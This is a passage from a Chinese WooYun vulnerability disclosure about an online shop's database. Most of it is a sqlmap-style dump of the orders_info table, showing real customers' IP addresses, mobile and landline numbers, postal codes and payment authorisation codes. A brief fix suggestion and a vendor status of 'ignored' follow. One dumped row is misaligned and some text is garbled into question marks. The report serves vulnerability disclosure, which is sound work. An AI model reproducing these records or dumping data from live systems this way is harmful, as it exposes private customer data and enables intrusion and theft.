| order_status      | varchar(8)       |
| order_total       | int(8)           |
| pay_account       | varchar(34)      |
| pay_mode          | varchar(10)      |
| receive_date      | date             |
| receiver_address  | varchar(200)     |
| receiver_city     | varchar(10)      |
| receiver_district | varchar(10)      |
| receiver_gender   | varchar(1)       |
| receiver_mobile   | varchar(10)      |
| receiver_name     | varchar(20)      |
| receiver_tel      | varchar(30)      |
| receiver_time     | varchar(1)       |
| receiver_zip      | varchar(5)       |
| TAX               | int(6)           |
| TAX_ID            | varchar(8)       |
| uid               | int(10) unsigned |
| USERSTAMP         | varchar(50)      |
| VAMT              | int(11)          |
+-------------------+------------------+


再来看几条数据:

Database: onceok
Table: orders_info
[8 entries]
+------------+------+--------+--------------------------+------+------+------+---------+---------------------+---------+---------------------------------+----------+----------+----------+----------+----------+--------------------------+-----------+-----------+---------------------+------------+---------------+---------------------+--------------------------+-------------+-------------+----------------+---------------------------------------------------------+-------------+-------------+------------------+--------------+--------------+--------------+--------------+---------------+---------------+---------------+---------------+----------------+-----------------+-----------------+------------------+------------------+-------------------+
| id         | uid  | TAX_ID | customer_id              | TAX  | AMT  | VAMT | memo    | cdate               | INV_NO  | err_msg                         | INV_DATE | INV_TYPE | discount | pay_mode | authcode | USERSTAMP                | INV_SDATE | INV_TITLE | DATESTAMP           | INV_DONATE | ip_address    | CREATE_DATE         | CREATE_USER              | CANCEL_DATE | NON_TAX_AMT | pay_account    | description                                             | order_total | CANCEL_USER | receiver_tel     | order_status | receive_date | receiver_zip | free_special | receiver_city | receiver_time | extra_product | receiver_name | ok_money_order | receiver_gender | receiver_mobile | receiver_address | free_full_amount | receiver_district |
+------------+------+--------+--------------------------+------+------+------+---------+---------------------+---------+---------------------------------+----------+----------+----------+----------+----------+--------------------------+-----------+-----------+---------------------+------------+---------------+---------------------+--------------------------+-------------+-------------+----------------+---------------------------------------------------------+-------------+-------------+------------------+--------------+--------------+--------------+--------------+---------------+---------------+---------------+---------------+----------------+-----------------+-----------------+------------------+------------------+-------------------+
| GL1110001B | 240  | NULL   | [email protected]   | 3772 | 3960 | 3960 | <blank> | 2006-12-11 16:10:06 | <blank> | ??????? ????????:5834?????????: | NULL     | <blank>  | 0        | 1        | NULL     | [email protected]   | NULL      | <blank>   | 2006-12-11 16:10:06 | 0          | 203.70.36.95  | 2006-12-11 16:10:06 | [email protected]   | NULL        | 188         | 0000           | err_no : 99; err_des : ??????? ????????:5834?????????:; | NULL        | NULL        | 0226582358       | OR9900       | NULL         | 220          | 0            | ???           | a             | NULL          | ???           | 0              | M               | 0935151182      | ???233?14?       | 0                | ???               |
| GL1210001B | 4938 | NULL   | [email protected]     | 353  | 370  | 370  | <blank> | 2006-12-12 16:06:17 | <blank> | ??????? ????????:9947?????????: | NULL     | 2        | 0        | 1        | NULL     | [email protected]     | NULL      | <blank>   | 2006-12-12 16:06:17 | 0          | 61.62.171.240 | 2006-12-12 16:06:17 | [email protected]     | NULL        | 17          | 0000           | err_no : 99; err_des : ??????? ????????:9947?????????:; | NULL        | NULL        | 02-26593579      | OR9900       | NULL         | 114          | 0            | ???           | a             | NULL          | ???           | 0              | M               | 0935589789      | ???347?2F        | 0                | ???               |
| GL1210002A | 3518 | NULL   | [email protected] | 429  | 450  | 450  | <blank> | 2006-12-12 16:23:42 | <blank> | NULL                            | NULL     | 2        | 0        | 1        | 033732   | [email protected] | NULL      | <blank>   | 2006-12-12 16:23:42 | 0          | 59.124.246.71 | 2006-12-12 16:23:42 | [email protected] | NULL        | 21          | 8015           | NULL                                                    | NULL        | NULL        | 02-87982798#8374 | OR2199       | NULL         | 114          | 0            | ???           | a             | NULL          | ???           | 0              | M               | 0920130683      | ????????392?16F  | 0                | ???               |
| GL12100031 | 4938 | NULL   | [email protected]     | 1210 | 1270 | 1270 | <blank> | 2006-12-12 17:31:11 | <blank> | NULL                            | NULL     | 2        | 0        | 1        | NULL     | [email protected]     | NULL      | <blank>   | 2006-12-12 17:31:11 | 0          | 61.62.171.240 | 2006-12-12 17:31:11 | [email protected]     | NULL        | 60          | NULL           | NULL                                                    | NULL        | NULL        | 02-26593579      | OR9900       | NULL         | 114          | 0            | ???           | a             | NULL          | ???           | 0              | M               | 0935589789      | ???347?2F        | 0                | ???               |
| GL12100042 | 4938 | NULL   | [email protected]     | 1334 | 1400 | 1400 | <blank> | 2006-12-12 17:32:55 | <blank> | NULL                            | NULL     | 2        | 0        | 1        | 055020   | 80117761                 | NULL      | <blank>   | 2006-12-18 16:08:09 | 0          | 61.62.171.240 | 2006-12-12 17:32:55 | [email protected]     | NULL        | 66          | 8827           | NULL                                                    | NULL        | NULL        | 02-26593579      | SH9999       | NULL         | 114          | 0            | ???           | a             | NULL          | ???           | 1400           | M               | 0935589789      | ???347?2F        | 0                | ???               |
| GL12100053 | 3518 | NULL   | [email protected] | 429  | 450  | 450  | <blank> | 2006-12-12 17:55:31 | <blank> | NULL                            | NULL     | 2        | 0        | 1        | 062100   | 29420797                 | NULL      | <blank>   | 2006-12-20 12:23:09 | 0          | 59.124.246.71 | 2006-12-12 17:55:31 | [email protected] | NULL        | 21          | 8015           | NULL                                                    | NULL        | NULL        | 02-87982798#8374 | SH9999       | NULL         | 114          | 0            | ???           | a             | NULL          | ???           | 450            | M               | 0920130683      | ????????392?16F  | 0                | ???               |
| GL1310001B | 4938 | NULL   | [email protected]     | 420  | 440  | 440  | <blank> | 2006-12-13 15:11:09 | <blank> | NULL                            | NULL     | 2        | 0        | 2        | NULL     | 27493127                 | NULL      | <blank>   | 2006-12-22 16:09:50 | 0          | 61.62.171.240 | 2006-12-13 15:11:09 | [email protected]     | NULL        | 20          | 81312121300019 | NULL                                                    | NULL        | NULL        | 02-26593579      | SH9999       | NULL         | 114          | 0            | ???           | a             | NULL          | ???           | 440            | M               | 0935589789      | ???347?2F        | 0                | ???               |
| GL1310002A | NULL   | [email protected] | 2362 | 2480 | 2480 | <blank> | 2006-12-13 17:16:11 | <blank> | NULL                            | NULL     | <blank>  | 0        | 1        | NULL     | [email protected] | NULL      | <blank>   | 2006-12-13 17:16:11 | 0          | 61.62.171.240 | 2006-12-13 17:16:11 | [email protected] | NULL        | 118         | NULL           | NULL                                                    | NULL        | NULL        | OR9900       | NULL         | 0            | NULL          | 0              | ?????????98      | 0                |
+------------+------+--------+--------------------------+------+------+------+---------+---------------------+---------+---------------------------------+----------+----------+----------+----------+----------+--------------------------+-----------+-----------+---------------------+------------+---------------+---------------------+--------------------------+-------------+-------------+----------------+---------------------------------------------------------+-------------+-------------+------------------+--------------+--------------+--------------+--------------+---------------+---------------+---------------+---------------+----------------+-----------------+-----------------+------------------+------------------+-------------------+


说的差不多了。

修复方案:

对用户的信息要有保障啊。

版权声明:转载请注明来源 暴走@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-26 23:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无